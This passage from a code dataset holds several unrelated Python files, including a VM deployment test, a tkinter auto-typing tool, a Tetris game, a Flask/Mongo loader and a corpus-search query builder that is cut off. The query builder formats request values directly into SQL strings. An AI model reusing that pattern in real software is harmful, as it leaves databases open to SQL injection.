fullname=app_name,\n type=\"Resource\",\n address=address,\n model=StaticApp.DEPLOYMENT_PATH,\n family=\"CS_GenericAppFamily\",\n description=None,\n attributes={\n \"Generic Static vCenter VM 2G.VM Name\": vm_name,\n \"Generic Static vCenter VM 2G.vCenter Resource Name\": \"vcenter\",\n \"Generic Static vCenter VM 2G.User\": \"\",\n \"Generic Static vCenter VM 2G.Password\": \"3M3u7nkDzxWb0aJ/IZYeWw==\",\n \"Generic Static vCenter VM 2G.Public IP\": \"\",\n \"Execution Server Selector\": \"\",\n },\n app_context=app_context,\n networks_info=None,\n shell_standard=None,\n shell_standard_version=None,\n )\n\n DeployedVMActions.register_deployment_path(StaticApp)\n actions = DeployedVMActions.from_remote_resource(resource, Mock())\n\n app = actions.deployed_app\n assert isinstance(app, StaticApp)\n assert app.name == app_name\n assert app.model == app.deployment_service_model == StaticApp.DEPLOYMENT_PATH\n assert app.private_ip == address\n assert app.vmdetails.uid == uuid\n assert app.attributes[f\"{StaticApp.DEPLOYMENT_PATH}.VM Name\"] == vm_name\n\n\ndef test_deployed_app():\n app_name = \"Azureubuntusimple\"\n address = \"10.0.1.3\"\n deployed_model = \"Generic App Model\"\n uuid = \"3d750874-09f1-4243-a598-6700bb648655\"\n\n app_context = AppContext(\n app_request_json=json.dumps(\n {\n \"name\": app_name,\n \"description\": None,\n \"logicalResource\": {\n \"family\": \"GenericAppFamily\",\n \"model\": \"GenericAppModel\",\n \"driver\": None,\n \"description\": \"\",\n \"attributes\": [\n {\"name\": \"Password\", \"value\": \"\"},\n {\"name\": \"PublicIP\", \"value\": \"\"},\n {\"name\": \"User\", \"value\": \"\"},\n ],\n },\n \"deploymentService\": {\n \"cloudProviderName\": \"Azure2Goldcode\",\n \"name\": \"Microsoft Azure 2nd Gen.Azure VM From Marketplace 2nd Gen\",\n \"model\": MyDeployedApp.DEPLOYMENT_PATH,\n \"driver\": None,\n \"attributes\": [\n {\n \"name\": \"MicrosoftAzure2G.AzureVMFromMarketplace2G.Disk\",\n \"value\": \"HDD\",\n },\n ],\n },\n }\n ),\n deployed_app_json=json.dumps(\n {\n \"name\": app_name,\n \"family\": \"Generic App Family\",\n \"model\": \"Generic App Model\",\n \"address\": address,\n \"attributes\": [\n {\"name\": \"Password\", \"value\": \"3M3u7nkDzxWb0aJ/IZYeWw==\"},\n {\"name\": \"User\", \"value\": \"adminuser\"},\n {\"name\": \"Public IP\", \"value\": \"\"},\n ],\n \"vmdetails\": {\n \"id\": \"4da74d28-50d9-4271-b2e4-b49eed1bb0fe\",\n \"cloudProviderId\": \"129b8fac-fd8d-4c37-bb1a-fdceba2f38d7\",\n \"uid\": uuid,\n \"vmCustomParams\": [],\n },\n }\n ),\n )\n resource = ResourceContextDetails(\n id=\"0917eb75-92ad-4291-9623-4235c81be76b\",\n name=app_name,\n fullname=app_name,\n type=\"Resource\",\n address=address,\n model=\"Generic App Model\",\n family=\"Generic App Family\",\n description=None,\n attributes={\n \"Password\": \"3M3u7nkDzxWb0aJ/IZYeWw==\",\n \"User\": \"adminuser\",\n \"Public IP\": \"\",\n },\n app_context=app_context,\n networks_info=None,\n shell_standard=None,\n shell_standard_version=None,\n )\n\n DeployedVMActions.register_deployment_path(MyDeployedApp)\n actions = DeployedVMActions.from_remote_resource(resource, Mock())\n\n app = actions.deployed_app\n assert isinstance(app, MyDeployedApp)\n assert app.name == app_name\n assert app.model == deployed_model\n assert app.deployment_service_model == MyDeployedApp.DEPLOYMENT_PATH\n assert app.private_ip == address\n assert app.vmdetails.uid == uuid\n assert app.attributes[f\"{MyDeployedApp.DEPLOYMENT_PATH}.Disk\"] == \"HDD\"\n assert app.attributes[\"User\"] == \"adminuser\"\n","sub_path":"tests/cp/core/request_actions/test_deployed_vm.py","file_name":"test_deployed_vm.py","file_ext":"py","file_size_in_byte":6468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"391404216","text":"#-------------------------------------------------------------------------------\r\n# Name: gui_typex\r\n# Purpose:provide user interface for Text to voice announce with text to typing program\r\n#\r\n# Author: Khairul Basar\r\n#\r\n# Created: 07-03-2018\r\n# Copyright: (c) 20053478 2018\r\n# Licence: \r\n#-------------------------------------------------------------------------------\r\n\r\n'''step==1==\r\n#-------------------------------------------------------------------------------\r\n\r\nimport tkinter module and create a base window\r\n\r\n\r\n\r\nfrom tkinter import *\r\nwindow = Tk()\r\nwindow.title(\"Gui for Docx2txt\")\r\nwindow.mainloop()\r\n\r\n\r\n'''\r\n\r\nimport os\r\nfrom tkinter import *\r\nfrom tkinter import filedialog\r\nimport tkinter as tk\r\n# import docx2txtv3\r\nfrom docx import Document\r\nimport ntpath\r\nimport shutil\r\n\r\n#=======for text to type & text to voice\r\nimport pyautogui\r\nimport time\r\nimport winsound\r\nimport pyttsx3\r\n\r\nwindow = Tk()\r\nwindow.geometry(\"520x200\")\r\nwindow.title(\"Gui for Typex\")\r\n\r\ncwd = os.getcwd()\r\n\r\nsw_lbl = Label(window, text=\"Use Typex to type text files in your text field\", font=(\"Arial\", 12))\r\nsw_lbl.grid(column=0, row=0, columnspan=3)\r\n\r\nlabel_docx_path = Label(window, text=\"Textfile dir: \", font=(\"Arial\", 12))\r\nlabel_docx_path.grid(column=0, row=1, sticky=\"W\")\r\n\r\nsource_path_txt_var = tk.StringVar()\r\nsource_path_txt = tk.Entry(window, width=50)\r\nsource_path_txt.grid(column=1, row=1, sticky=\"W\")\r\nsource_path_txt.insert(END, cwd)\r\nlabel_txt_path = Label(window, text=\"Delay time(s): \", font=(\"Arial\", 12))\r\nlabel_txt_path.grid(column=0, row=2, sticky=\"W\")\r\n\r\n# delay for typing\r\ndest_path_txt_var = tk.StringVar()\r\ndest_path_txt = tk.Entry(window, width=10)\r\ndest_path_txt.grid(column=1, row=2, sticky=\"W\")\r\ndest_path_txt.insert(END, 45)\r\n\r\n\r\n# rate of typing Label\r\nrate_label_txt = Label(window, text=\"Rate of type: \", font=(\"Arial\", 12))\r\nrate_label_txt.grid(column=1, row=2, sticky=\"N\")\r\n\r\n# rate of typing\r\nrate_type_txt_var = tk.StringVar()\r\nrate_type_txt = tk.Entry(window, width=10)\r\nrate_type_txt.grid(column=1, row=2, sticky=\"E\")\r\nrate_type_txt.insert(END, 0.01)\r\n\r\n\r\ndef clicked_browse_source():\r\n dir = filedialog.askdirectory()\r\n source_path_txt.delete(0, END)\r\n source_path_txt.insert(0, dir)\r\n return\r\n\r\n# Clicked browsed destination folder button\r\n\r\n\r\n'''\r\ndef clicked_browse_dest():\r\n\tdir = filedialog.askdirectory()\r\n\tdest_path_txt.delete(0, END)\r\n\tdest_path_txt.insert(0, dir)\r\n\treturn\r\n'''\r\n\r\n\r\ndef say(s):\r\n engine = pyttsx3.init()\r\n rate = engine.getProperty('rate')\r\n engine.setProperty('rate', rate)\r\n voices = engine.getProperty('voices')\r\n # for voice in voices:\r\n engine.setProperty('voice', 'english-us')\r\n # print voice.id\r\n engine.say(s)\r\n a = engine.runAndWait() # blocks\r\n\r\n\r\ndef typex(dir, delaytime, interval):\r\n for filename in os.listdir(dir):\r\n fx = os.path.abspath(filename)\r\n say('Starting to type file ' + filename)\r\n say('filename: ' + filename)\r\n say('I repeat, filename: ' + filename)\r\n say('Waiting ' + str(round(delaytime, 2)) + 'seconds before starting')\r\n # print(fx)\r\n d1 = delaytime / 3.0 # 1/3rd div of whole wait time\r\n # 2xd1=2/3rd of whole time, 3xd1=whole time\r\n time.sleep(d1)\r\n say('Waiting ' + str(round(2 * d1, 2)) + 'seconds before starting')\r\n time.sleep(d1)\r\n say('Waiting ' + str(round(d1, 2)) + 'seconds before starting')\r\n time.sleep(d1)\r\n with open(dir + \"\\\\\" + filename, \"r\") as fxo:\r\n # print(fxo.read())\r\n for line in fxo:\r\n pyautogui.typewrite(line, interval)\r\n\r\n winsound.PlaySound(\"SystemExit\", winsound.SND_ALIAS)\r\n say('Finished typing file: ' + filename)\r\n say(\"Waiting to for\" + str(delaytime / 2.0) + 'seconds')\r\n time.sleep(delaytime / 2.0)\r\n\r\n\r\nbtn_browse_source = Button(window, text=\"...file dir\", bg=\"gray\", fg=\"yellow\", command=clicked_browse_source)\r\nbtn_browse_source.grid(column=2, row=1, sticky=\"W\")\r\n\r\n'''\r\nbtn_browse_dest = Button(window, text=\"...text dir\", bg=\"gray\", fg=\"blue\", command=clicked_browse_dest)\r\nbtn_browse_dest.grid(column=2, row=2)\r\n'''\r\n\r\nmgs_txt = Label(window, text=\"Welcome! Typex is used to type existing text\" + \"\\n\" + \" from a text file into active text field\", font=(\"Arial\", 12))\r\nmgs_txt.grid(column=0, row=5, columnspan=3, sticky=\"N\")\r\n\r\n\r\ndef clicked_btn_convert():\r\n oks = 0\r\n okd = 0\r\n rate = 0\r\n if os.path.isdir(source_path_txt.get()):\r\n mgs_txt.configure(text=\"Source path for docx: OK!\")\r\n oks = 1\r\n else:\r\n mgs_txt.configure(text=\"Error! Source text path is invalid.\")\r\n\r\n if oks == 1:\r\n try:\r\n delay = float(dest_path_txt.get())\r\n # rate or interval between typing two chars\r\n rate = float(rate_type_txt.get())\r\n mgs_txt.configure(text=\"Program started...\")\r\n if top_is_checked.get():\r\n window.attributes('-topmost', True)\r\n else:\r\n window.attributes('-topmost', True)\r\n window.update()\r\n window.attributes('-topmost', False)\r\n\r\n oks = 2\r\n except:\r\n mgs_txt.configure(text=\"Error: Invalid time delay!\")\r\n oks = 0\r\n\r\n if oks == 2:\r\n typex(os.path.abspath(source_path_txt.get()), delay, rate)\r\n\r\n\r\nbtn_convert = Button(window, text=\"Click to start\", bg=\"orange\", fg=\"blue\", command=clicked_btn_convert)\r\nbtn_convert.grid(column=1, row=4)\r\n\r\ntop_is_checked = IntVar()\r\ncheck = Checkbutton(window, text=\"Always on top\", onvalue=1, offvalue=0, variable=top_is_checked)\r\ncheck.grid(column=0,row=4, sticky='W')\r\n\r\n\r\nbtn_exit = Button(window, text=\"Exit\", bg=\"light gray\", fg=\"blue\", width=10, command=window.destroy)\r\nbtn_exit.grid(column=2, row=6, sticky='W')\r\n\r\n\r\n\r\ndef main():\r\n window.mainloop()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"gui_typex.py","file_name":"gui_typex.py","file_ext":"py","file_size_in_byte":5949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"604298082","text":"import pygame\r\nfrom settings import Settings\r\nfrom shape_formats import Shapes\r\nimport game_functions as gf\r\n\r\ndef main():\r\n pygame.init()# Инициализация pygame\r\n game_sett = Settings()# Обьект настроек\r\n screen = pygame.display.set_mode((game_sett.W, game_sett.H))# Экран\r\n pygame.display.set_caption('Tetris')# Заголовок окна\r\n screen.fill(game_sett.bg_color)# Фон экрана\r\n pygame.display.update()# Обновление экрана\r\n clock = pygame.time.Clock()# Переменная времени\r\n\r\n score = 0# Перменная отбражения очков\r\n\r\n locked_pos = {}# Словарь свободных позиций в сетке\r\n grid = gf.create_grid(game_sett.bg_color, locked_pos)# Сетка\r\n\r\n sh = Shapes()\r\n shapes = sh.get_shapes_list()# Список фигур\r\n shape_colors = sh.get_colors_list(game_sett)# Список цветов\r\n \r\n current_shape = gf.get_shape(shapes, shape_colors)# Тек.фигура\r\n next_shape = gf.get_shape(shapes, shape_colors)# След.фигура\r\n\r\n while True:\r\n grid = gf.create_grid(game_sett.bg_color, locked_pos)# Сетка\r\n\r\n # Анимация падения фигур\r\n gf.falling_animation(current_shape, clock, grid, game_sett)\r\n\r\n # Обработка событий клавиатуры\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n exit()\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_LEFT:# Влево\r\n current_shape.x -= 1\r\n if not gf.valid_space(current_shape, grid, game_sett):\r\n current_shape.x += 1\r\n elif event.key == pygame.K_RIGHT:# Вправо\r\n current_shape.x += 1\r\n if not gf.valid_space(current_shape, grid, game_sett):\r\n current_shape.x -= 1\r\n elif event.key == pygame.K_UP:# Поворот фигуры\r\n current_shape.rotation = current_shape.rotation - 1 % len(current_shape.shape)\r\n if not gf.valid_space(current_shape, grid, game_sett):\r\n current_shape.rotation = current_shape.rotation - 1 % len(current_shape.shape)\r\n elif event.key == pygame.K_DOWN:# Ускорение вниз\r\n current_shape.y += 1\r\n if not gf.valid_space(current_shape, grid, game_sett):\r\n current_shape.y -= 1\r\n \r\n # Добавление цвета фигуры в сетку для отрисовки\r\n shape_pos = gf.convert_shapes(current_shape)\r\n for x, y in shape_pos:\r\n if y > -1:\r\n grid[y][x] = current_shape.color\r\n\r\n # Если фигура приземлилась на дно\r\n if game_sett.change_piece:\r\n for x, y in shape_pos:\r\n locked_pos[(x, y)] = current_shape.color\r\n current_shape = next_shape\r\n next_shape = gf.get_shape(shapes, shape_colors)\r\n game_sett.change_piece = False\r\n\r\n # Очистка заполненных линий\r\n score += gf.clearing_rows(grid, locked_pos, game_sett)*10\r\n \r\n\r\n # Отрисовка экрана, сетки, след. фигуры\r\n gf.draw_window(screen, game_sett, grid, next_shape)\r\n\r\n # Проверка конца игы\r\n if gf.check_lost(locked_pos):\r\n gf.end_game(screen, score, game_sett)\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"69378125","text":"\"\"\"\nGiven a string in Python. The task is to check whether the string has at least one letter(character) and one number.\nReturn “True” if the given string full fill above condition else return “False” (without quotes).\nExamples:\n\nInput: welcome2ourcountry34\nOutput: True\n\nInput: stringwithoutnum\nOutput: False\n\"\"\"\n\n\ndef is_anumber_aletter_exist(text: str) -> bool:\n number_flag = False\n letter_flag = False\n\n for char in text:\n if char.isdigit():\n number_flag = True\n\n if char.isalpha():\n letter_flag = True\n\n return number_flag and letter_flag\n","sub_path":"geeksforgeeks/strings/ex8.py","file_name":"ex8.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"520037843","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/pyjon/events/dispatcher.py\n# Compiled at: 2014-10-06 09:13:36\n\"\"\"a basic event dispatcher mechanism\n\"\"\"\nimport logging\nlogger = logging.getLogger('EventDispatcher')\n\nclass EventDispatcher(type):\n \"\"\"An event dispatcher\n \"\"\"\n\n def __init__(cls, name, bases, newattrs):\n \"\"\" Magic needed to create a class with EventDispatcher methods,\n and an empty callbacks property \"\"\"\n super(EventDispatcher, cls).__init__(name, bases, newattrs)\n cls.emit_event = EventDispatcher.emit_event\n for key, value in EventDispatcher.__dict__.items():\n if not key.startswith('__'):\n setattr(cls, key, value)\n\n def test_callbacks_dict(self):\n if not hasattr(self, 'callbacks'):\n self.callbacks = dict()\n\n def add_listener(self, name, callback, *args, **kwargs):\n \"\"\"Adds an event listener on the instance.\n \n :param name: event name to listen for\n :type name: unicode or str\n\n :param callback: the callable to fire when the event is emitted\n :type callback: callable\n \n Additionnal args and kwargs are passed to the callback when the event\n is fired\n \n If you want to stop the callback chain, your callback should\n return False. All other return values are discarded.\n \"\"\"\n self.test_callbacks_dict()\n d = dict(callback=callback, args=args, kwargs=kwargs)\n self.callbacks.setdefault(name, []).append(d)\n\n def remove_listener(self, name, func):\n \"\"\"\n Removes a callback from the callback list for the given\n event name.\n\n :param name: event name to listen for\n :type name: unicode or str\n \n :param func: the function of the callback to unregister\n :type func: method\n \"\"\"\n self.test_callbacks_dict()\n if self.callbacks.has_key(name):\n callbacks = self.callbacks[name]\n [ callbacks.remove(callback) for callback in callbacks if callback['callback'] == func ]\n\n def emit_event(self, name, *args, **kwargs):\n \"\"\"\n Emit a named event. This will fire all the callbacks registered\n for the named event.\n\n :param name: event name to listen for\n :type name: unicode or str\n\n Additionnal args and kwargs are passed to the callbacks (before the one that were passed to add_listener)\n \"\"\"\n logger.debug('%s: calling %s with %s and %s' % (repr(self), name,\n repr(args), repr(kwargs)))\n self.test_callbacks_dict()\n for cbdict in self.callbacks.get(name, list()):\n handler = cbdict.get('callback')\n listener_args = cbdict.get('args')\n listener_kwargs = cbdict.get('kwargs')\n myargs = list(args)\n myargs.extend(listener_args)\n mykwargs = kwargs\n mykwargs.update(listener_kwargs)\n result = handler(*myargs, **mykwargs)\n if result is False:\n break","sub_path":"pycfiles/pyjon.events-1.2-py2.7/dispatcher.py","file_name":"dispatcher.py","file_ext":"py","file_size_in_byte":3197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"256536435","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Jul 13 10:42:38 2018\r\n\r\n@author: ukn1hc\r\n\"\"\"\r\n\r\nimport sys\r\n\r\nfilepath = sys.argv[1]\r\nbyteoder = sys.argv[2] # 'm' = msb or 'i' = intel\r\n\r\n\r\n# Load file Excel input\r\nfrom openpyxl import load_workbook\r\nwb = load_workbook(filename = filepath)\r\nsheet_ranges = wb['Sheet1'] # grab the active worksheet\r\n\r\n\r\n# Prepare the excel output\r\nfrom openpyxl import Workbook\r\nwb1 = Workbook()\r\nws = wb1.active # grab the active worksheet\r\n\r\nexcel_title=['ID',\r\n \"Frame Name\",\r\n \"Cycle Time [ms]\",\r\n \"Launch Type\",\r\n \"Launch Parameter\",\r\n \"Signal Byte No.\",\r\n \"Signal Bit No.\",\r\n \"Signal Name\",\r\n \"Signal Function\",\r\n \"Signal Length [Bit]\",\r\n \"Signal Default\",\r\n \"Signal Not Available\",\r\n \"Byteorder\",\r\n \"Nodes\",\r\n \"Vector__XXX\",\r\n \"Value\",\r\n \"Name / Phys. Range\",\r\n \"Function / Increment Unit\"]\r\n\r\n# Add title row\r\nfor i in range(0,len(excel_title)):\r\n ws.cell(row = 1, column = i+1, value = excel_title[i])\r\n \r\n\r\n\r\nwb1.save(\"excel2dbc_{}\".format(filepath))\r\n\r\n","sub_path":"Scan_input.py","file_name":"Scan_input.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"616084504","text":"from SinglyLinkedNode import SinglyLinkedNode\n\n\nclass SinglyLinkedList:\n\n def __init__(self):\n self._first=None\n self._last=None\n self._size=0\n\n\n\n def __len__(self):\n return self._size\n\n\n def isEmpty(self):\n return self._size==0\n\n def append(self, element):\n newNode = SinglyLinkedNode(element, None)\n if self._last == None:\n self._first = self._last = newNode\n else:\n self._last.next = newNode\n self._last = newNode\n self._size += 1\n\n\n\n\n\n def remove(self,k):\n if not 0\",end=\"\")\n node=node.next\n else:\n print(node.element)\n\n\n\ndef main():\n list=SinglyLinkedList()\n for i in range(5):\n list.append(int(input(\"enter a number\")))\n\n list.printList()\n\n\n\n\n","sub_path":"secondProject/singlyLinkedList.py","file_name":"singlyLinkedList.py","file_ext":"py","file_size_in_byte":1962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"330350074","text":"#!/usr/bin/env python\n'''\nLoads Raw data into Mongo Database\n'''\n\nfrom flask import Flask\nfrom datetime import datetime\nimport traceback\nimport configparser\nimport sys\nfrom bson.json_util import loads\nfrom bson.json_util import dumps\nfrom pymongo import MongoClient\nimport os.path\nfrom io import StringIO\n\n\ndef displayCatalog(catalog):\n fp = StringIO()\n fp.write(\"\")\n fp.write(\"Number Name Uom Min Max Type \")\n for doc in catalog.find().sort('_id'):\n fp.write(\"%s %s %s %s %s %s \" % \\\n (doc['_id'],doc['name'],doc['uom'],doc['min'],doc['max'],doc['type']))\n fp.write(\"
\")\n return fp.getvalue()\n\ndef readCatalog(catalog,key):\n '''\n Reads entryies from paramter catalog\n '''\n try:\n entry = catalog.find_one({'_id': key})\n print(entry)\n except:\n exc_type, exc_value, exc_traceback = sys.exc_info()\n print('%s %s' % (exc_type,exc_value))\n traceback.print_tb(exc_traceback)\n\ndef errorLog(errors,src,msg):\n obj = {}\n obj['date'] = datetime.now()\n obj['source'] = src\n obj['msg'] = msg\n errors.insert_one(obj)\n\ndef loadRawData(catmap,raw,errors,data):\n ''' \n Data loading procedure\n '''\n try:\n obj = {}\n tok = data.split(';')\n now = datetime.now()\n obj['_id'] = '%s_%s' % (tok[0],now.strftime('%Y%m%d-%H%M%S.%f'))\n obj['loaddate'] = datetime.now()\n obj['meter'] = tok[0]\n obj['testdate'] = datetime.strptime(tok[1],'%Y%m%d%H%M%S') \n tok.pop(0)\n tok.pop(0)\n for item in tok:\n if item[:3] in catmap:\n catitem = catmap[item[:3]]\n name = item[:3] #catitem['name']\n value = item[3:]\n # Convert?\n if (catitem['type'] == 'F'):\n obj[name] = float(value)\n else:\n obj[name] = value\n else:\n errorLog(errors,data,'Unknown parameter %s' % item[:3])\n\n raw.insert(obj)\n print('Updated db')\n except:\n exc_type, exc_value, exc_traceback = sys.exc_info()\n errorLog(errors,data,'%s %s' % (exc_type,exc_value))\n traceback.print_tb(exc_traceback)\n raise\n\n\n\n# Config File\nfp = '/usr/local/etc/config.ini'\nif not os.path.isfile(fp):\n print(\"Can't find config file: %s\" % fp)\n sys.exit(1)\n\nconfig = configparser.ConfigParser()\nconfig.read_file(open(fp))\n\nclient = MongoClient(config['mongo']['host'],int(config['mongo']['port']))\ndb = client.data\nraw = db.raw\nerrors = db.errors\n\n# Load catmap\ncatmap = {}\ncatalog = db.catalog\ncursor = catalog.find()\nfor doc in cursor:\n catmap[doc['_id']] = doc\n\n# Start Server\napp = Flask(__name__)\n\n@app.route('/')\ndef root():\n return('Hello')\n\n@app.route('/d/')\ndef data_input(data=None):\n if (data is None):\n return('Data not supplied\\n')\n else:\n try:\n loadRawData(catmap,raw,errors,data)\n return('Loaded data...\\n')\n except:\n exc_type, exc_value, exc_traceback = sys.exc_info()\n print('%s %s' % (exc_type,exc_value))\n return('Error Loading Data: %s\\n' % traceback.print_tb(exc_traceback))\n\n@app.route('/catalog')\ndef cat():\n return(displayCatalog(catalog))\n","sub_path":"aqua-server.py","file_name":"aqua-server.py","file_ext":"py","file_size_in_byte":3389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"225791765","text":"from django.utils.translation import ugettext_lazy as _\nErrorMsg = {\n 'phone': _(\"Please enter your phone number\"),\n 'zipcode': _(\"Please enter your zipcode\"),\n 'email': _(\"Please enter your email.\"),\n 'service': _(\"Please select a service.\"),\n 'city': _(\"Please let us know where you live.\"),\n 'name': _(\"Please enter your name.\"),\n 'comment': _(\"Please enter your question.\"),\n 'dateToBeDone': _(\"Please enter the date for cleaning.\"),\n}\n\n\ndef get_error_msg(field_name):\n return ErrorMsg.get(\n field_name,\n _('field %(field)s cannot be empty!') % {'field': field_name}\n )\n\nORDER_RECEIVED_MSG = _(\"Thank you! we have received your order.\")\nCONTACTED_MSG = _(\"Thank you! We have received your question and will get back to you shortly.\")\nINVALID_FORM_MSG = _(\"Please correct the form fields.\")\nSERVICE_ZIP_NOT_AVAILABLE = _(\"The service is not available in your area.\")\nSUBSCRIBED_MSG = _(\"Thank you for subscribing! We will inform you when we come to your city.\")\nREFERENCE_CODE_INVALID = _(\"Reference code is not valid! Please enter a valid code.\")\nREFERENCE_CODE_SUCCEED = _(\"Congratulations! Your voucher is activated. Please proceed with your booking.\")","sub_path":"utils/messages.py","file_name":"messages.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"353359601","text":"# -*- Encoding: utf-8 -*-\nimport codecs\nimport MySQLdb\nimport MySQLdb.cursors\nimport time\nimport urllib\n\nimport attribute\n\nfrom ..utils import is_lex_mat\n\n\nmax_time = 60 * 5 # 5 minutes\n\n_parser = attribute.Parser()\n\ndef _quotetext(s):\n if not s:\n return \"\"\n return s.replace('&', '&').replace('<', '<').replace('>', '>')\n\ndef _quoteattr(s):\n return _quotetext(s).replace(\"'\", ''').replace('\"', '"').replace('\\n', '
').replace('\\r', '
').replace('\\t', ' ')\n\ndef ProduceCondition(tableName, fieldName, data):\n l = []\n\n for el in data:\n y = []\n\n for e in el:\n neg = \"\"\n if e[0] == \"-\":\n neg = \"NOT \"\n e = e.replace(\"-\", \"\")\n y.append(u\"%sEXISTS(SELECT * FROM %s WHERE %s.id = words.%s AND %s.value = '%s')\" % (neg, tableName, tableName, fieldName, tableName, e))\n\n if y:\n l.append(\"(%s)\" % \" AND \".join(y))\n if l:\n return \"(%s)\" % \" OR \".join(l)\n\n return None\n\nclass Attributes:\n def __init__(self, cursor, tableName):\n self.cursor = cursor\n self.tableName = tableName\n\n def getId(self, val):\n self.cursor.execute(u\"SELECT id FROM %s WHERE value = '%s';\" % (self.tableName, val))\n res = self.cursor.fetchall()\n if len(res) > 0:\n return res[0][0]\n else:\n return None\n\n def getValue(self, n):\n self.cursor.execute(u\"SELECT value FROM %s WHERE id = %s;\" % (self.tableName, n))\n\n return [x[0] for x in self.cursor.fetchall()]\n\nclass Word:\n def __init__(self, query, n):\n place = n + 1\n self.n = n\n\n self.lex = query.get(\"lex%s\" % place, [\"\"])[0].lower()\n self.lexParsed = _parser.parse(self.lex)\n\n self.gramm = query.get(\"gramm%s\" % place, [\"\"])[0]\n self.grammParsed = _parser.parse(self.gramm)\n\n self.flags = query.get(\"flags%s\" % place, [\"\"])[0]\n self.flagsParsed = _parser.parse(self.flags)\n\n self.father = int(query.get(\"parent%s\" % place, [0])[0]) - 1\n\n self.linkExists = \"link%s\" % place in query and self.father >= 0\n\n self.link = query.get(\"type%s\" % place, [\"\"])[0].lower()\n self.linkParsed = _parser.parse(self.link)\n\n self.lfVal = int(query.get(\"parent%s\" % place, [0])[0]) - 1\n self.lfExists = \"lf%s\" % place in query and self.lfVal >= 0\n self.lfFunc = query.get(\"lf_func%s\" % place, [\"\"])[0]\n self.lfFuncParsed = _parser.parse(self.lfFunc)\n\n self.lfPrep = query.get(\"lf_prep%s\" % place, [\"\"])[0]\n self.lfPrepParsed = _parser.parse(self.lfPrep)\n\n self.lfTable = 'lf_%d' % self.n if self.lfPrep else 'lexical_functions'\n\n self.minDist = None\n self.maxDist = None\n\n self.level = None\n\n try:\n q = query.get(\"min%s\" % place, [\"\"])[0]\n if len(q) > 0:\n self.minDist = int(q)\n except:\n pass\n try:\n q = query.get(\"max%s\" % place, [\"\"])[0]\n if len(q) > 0:\n self.maxDist = int(q)\n except:\n pass\n\n if self.maxDist != None and self.minDist == None:\n self.minDist = 0\n\n if self.minDist != None and self.maxDist != None:\n x = [self.minDist, self.maxDist]\n self.minDist = min(x)\n self.maxDist = max(x)\n elif self.minDist != None:\n if self.minDist == 0:\n self.minDist = None\n elif self.minDist < 0:\n self.maxDist = self.minDist\n self.minDist = None\n\n try:\n q = query.get(\"level%s\" % place, [\"\"])[0]\n if len(q) > 0:\n self.level = int(q)\n except:\n pass\n\n # each SQL statement is of the form \"CREATE <...> SELECT <...>\"\n # so these two lists are in direct element-to-element correspondence\n self.create = []\n self.query = []\n\n def isWord(self):\n return len(self.lexParsed) > 0 or len(self.grammParsed) > 0 or len(self.flagsParsed) > 0\n\n def isRelated(self):\n return (self.father >= 0 or self.lfVal >= 0) \\\n and ((self.minDist != None and self.maxDist != None) or self.linkExists or self.lfExists)\n\n def empty(self):\n return not self.isWord() and not self.isRelated()\n\n def value(self):\n x = 0\n if self.empty():\n x = -1\n else:\n if self.isWord():\n if len(self.lex) > 0:\n x += 7\n if len(self.gramm) > 0:\n x += 4\n if len(self.flags) > 0:\n x += 4\n if self.isRelated():\n if self.linkExists:\n if len(self.link) > 0:\n x += 5\n else:\n x += 2\n if self.minDist != None or self.maxDist != None:\n x += 1\n return x\n\n def xml(self, full=False):\n x = []\n if full:\n x.append(u'n=\"%s\" value=\"%s\"' % (self.n, self.value()))\n if self.level != None:\n x.append(u'level=\"%s\"' % self.level)\n if self.minDist != None and self.maxDist != None:\n x.append(u'distance-min=\"%s\"' % self.minDist)\n x.append(u'distance-max=\"%s\"' % self.maxDist)\n elif self.minDist != None:\n x.append(u'distance-min=\"%s\"' % self.minDist)\n elif self.maxDist != None:\n x.append(u'distance-min=\"%s\"' % self.maxDist)\n\n if len(self.lex) > 0:\n x.append(u'lex=\"%s\"' % _quoteattr(self.lex))\n if len(self.gramm) > 0:\n x.append(u'gramm=\"%s\"' % _quoteattr(self.gramm))\n if self.flags > 0:\n x.append(u'flags=\"%s\"' % _quoteattr(self.flags))\n if full and self.father >= 0:\n x.append(u'father=\"%s\"' % self.father)\n if len(self.link) > 0:\n x.append(u'link=\"%s\"' % self.link)\n if len(self.lfFunc) > 0:\n x.append(u'lf_func=\"%s\"' % self.lfFunc)\n if full:\n if len(self.create) > 0:\n x.append(u'create=\"%s\"' % '; '.join([_quoteattr(create_clause) for create_clause in self.create]))\n if len(self.query) > 0:\n x.append(u'query=\"%s\"' % '; '.join([_quoteattr(query_clause) for query_clause in self.query]))\n return u' ' % \" \".join(x)\n\n def writeTraget(self, prevname, prevcolums, n, relation='syntax'):\n table_name = self.lfTable if relation == 'lexical_function' else 'words'\n from_element_name = 'father' if relation == 'syntax' else 'lf_val'\n x = None\n if n == self.n:\n x = \"%s.%s\" % (table_name, 'word')\n elif (self.linkExists and self.father == n) or (self.lfExists and self.lfVal == n):\n x = \"%s.%s\" % (table_name, from_element_name)\n elif n in prevcolums:\n x = 